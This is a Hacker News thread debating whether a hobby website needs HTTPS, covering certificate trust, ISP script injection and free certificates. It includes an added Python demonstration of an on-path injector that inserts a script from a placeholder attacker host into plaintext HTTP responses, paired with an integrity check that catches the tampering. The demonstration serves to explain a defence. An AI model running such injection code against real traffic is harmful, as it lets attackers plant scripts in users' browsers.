by jtafurth 447 days ago
I worked for an authority that issued digital certificates for SSL and digital signatures. It's not only about providing encryption but also about trust: when a top-level entity issues an SSL certificate, a number of identity validations are carried out, adding an extra layer of confidence on that website.

This may seem inconsequential for static websites without PII, however most browsers consider it important as it reduces the risk for all parties involved when encrypted communication is used and the content provider has taken basic steps for identity verification.

There are logic flaws with this approach to security imo, but it's the most commonly used technique at the moment.


you didn't answer the _why do we need all that for a drum beat making website_?
Unauthenticated http is a vector for opportunistic malware. They don’t target specific websites, just inject evil.js wherever.
Your ISP sniffing and MiTMing traffic on the wire is the least likely vector of malware injection.
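To make the "inject evil.js wherever" point concrete, here is an added example that is not part of the thread: a minimal on-path rewriter for a plaintext HTTP/1.1 response, followed by a check showing that the same edit is detected once the response is integrity-protected. The sample response, the attacker host `attacker.invalid` and the session key are all constructed for the demo; the HMAC tag is a stand-in for TLS record authentication, chosen to show the property (tampering is caught), not TLS's actual internals.

```python
"""
Added example (not code from the HN thread). Shows how little it takes
for an on-path device to rewrite a plaintext HTTP response, and why an
integrity-protected channel stops the same edit.

Assumptions: the response is a constructed sample; attacker.invalid and
the session key are placeholders; the HMAC stands in for TLS record
authentication and is not how TLS is built internally.
"""
import hashlib
import hmac

# Constructed sample: what a hobby site might send over plain HTTP.
SAMPLE_BODY = b"<html><body><h1>Drum beats</h1><p>Make a beat.</p></body></html>"
SAMPLE_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    + b"Content-Length: %d\r\n" % len(SAMPLE_BODY)
    + b"\r\n"
    + SAMPLE_BODY
)

# Placeholder host; .invalid is reserved so this never resolves.
INJECTED_TAG = b'<script src="http://attacker.invalid/evil.js"></script>'


def split_response(raw):
    """Split a raw HTTP/1.1 response into (status line, headers dict, body).
    Header names are lowercased so lookups are case-insensitive."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no header terminator in response")
    status, *header_lines = head.split(b"\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def inject_script(raw, tag=INJECTED_TAG):
    """Return `raw` with `tag` inserted before </body>, Content-Length
    corrected so the browser renders the whole thing. Responses that are
    not identity-encoded text/html are passed through untouched (a real
    injector would decompress / de-chunk first; that is out of scope)."""
    status, headers, body = split_response(raw)
    if not headers.get(b"content-type", b"").startswith(b"text/html"):
        return raw
    if headers.get(b"content-encoding", b"identity") != b"identity":
        return raw
    if b"transfer-encoding" in headers:
        return raw
    idx = body.lower().rfind(b"</body>")  # lower() keeps ASCII length, so idx is valid in body
    if idx < 0:
        return raw
    new_body = body[:idx] + tag + body[idx:]

    # Rebuild the header block, rewriting Content-Length for the longer body.
    head = raw.split(b"\r\n\r\n", 1)[0]
    lines = []
    for line in head.split(b"\r\n"):
        if line.lower().startswith(b"content-length:"):
            line = b"Content-Length: %d" % len(new_body)
        lines.append(line)
    return b"\r\n".join(lines) + b"\r\n\r\n" + new_body


def seal(key, raw):
    """Stand-in for an authenticated channel: tag the bytes with an HMAC
    keyed with something only the two endpoints know."""
    return hmac.new(key, raw, hashlib.sha256).digest()


def verify(key, raw, tag):
    """Constant-time check that `raw` is exactly what the sender tagged."""
    return hmac.compare_digest(hmac.new(key, raw, hashlib.sha256).digest(), tag)


def demo():
    """Run both sides and return the observations as a dict."""
    key = b"session-key-known-only-to-the-endpoints"  # constructed placeholder
    tampered = inject_script(SAMPLE_RESPONSE)
    _, hdrs, body = split_response(tampered)
    tag = seal(key, SAMPLE_RESPONSE)
    return {
        "plain_http_injected": INJECTED_TAG in tampered,
        "content_length_consistent": int(hdrs[b"content-length"]) == len(body),
        "authenticated_original_accepted": verify(key, SAMPLE_RESPONSE, tag),
        "authenticated_tampered_rejected": not verify(key, tampered, tag),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The injector needs no knowledge of the site: any identity-encoded HTML passing through gets the tag, which is exactly the opportunistic pattern the comment describes. The second half shows why the fix is channel integrity rather than "nothing sensitive on this page": once the bytes are authenticated end to end, the same rewrite is rejected by the client regardless of what the page contains.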

ISPs are usually serious businesses with reputations and don't hack their own customers.

That “usually” is doing a ton of work. I remember Vodafone injecting scripts into webpages many years ago. While trying to find a source, I bumped into other shenanigans.

https://www.simpleanalytics.com/blog/vodafone-deutsche-telek...

Out of all the bad actors on the Internet, your ISP is the least bad.
That’s not a valid defence, it’s moving the goalposts and whataboutism. ISPs shouldn’t be bad actors at all and they have the ability to do the most harm.
Maybe if they live in a high income country with relatively strong consumer protections and are using their home ISP. But quite a lot of the internet is very much not that.

In some places and on some networks, MiTMing http traffic for undesirable use-cases is routine.

At least so that login / register data don't go to the middle man.
You don't. But you will be penalized by Big Co for not supporting https.

(It's effectively a "doing business on the Internet" tax. Thankfully not that expensive for small hobby projects now.)

It's literally $0 with LetsEncrypt.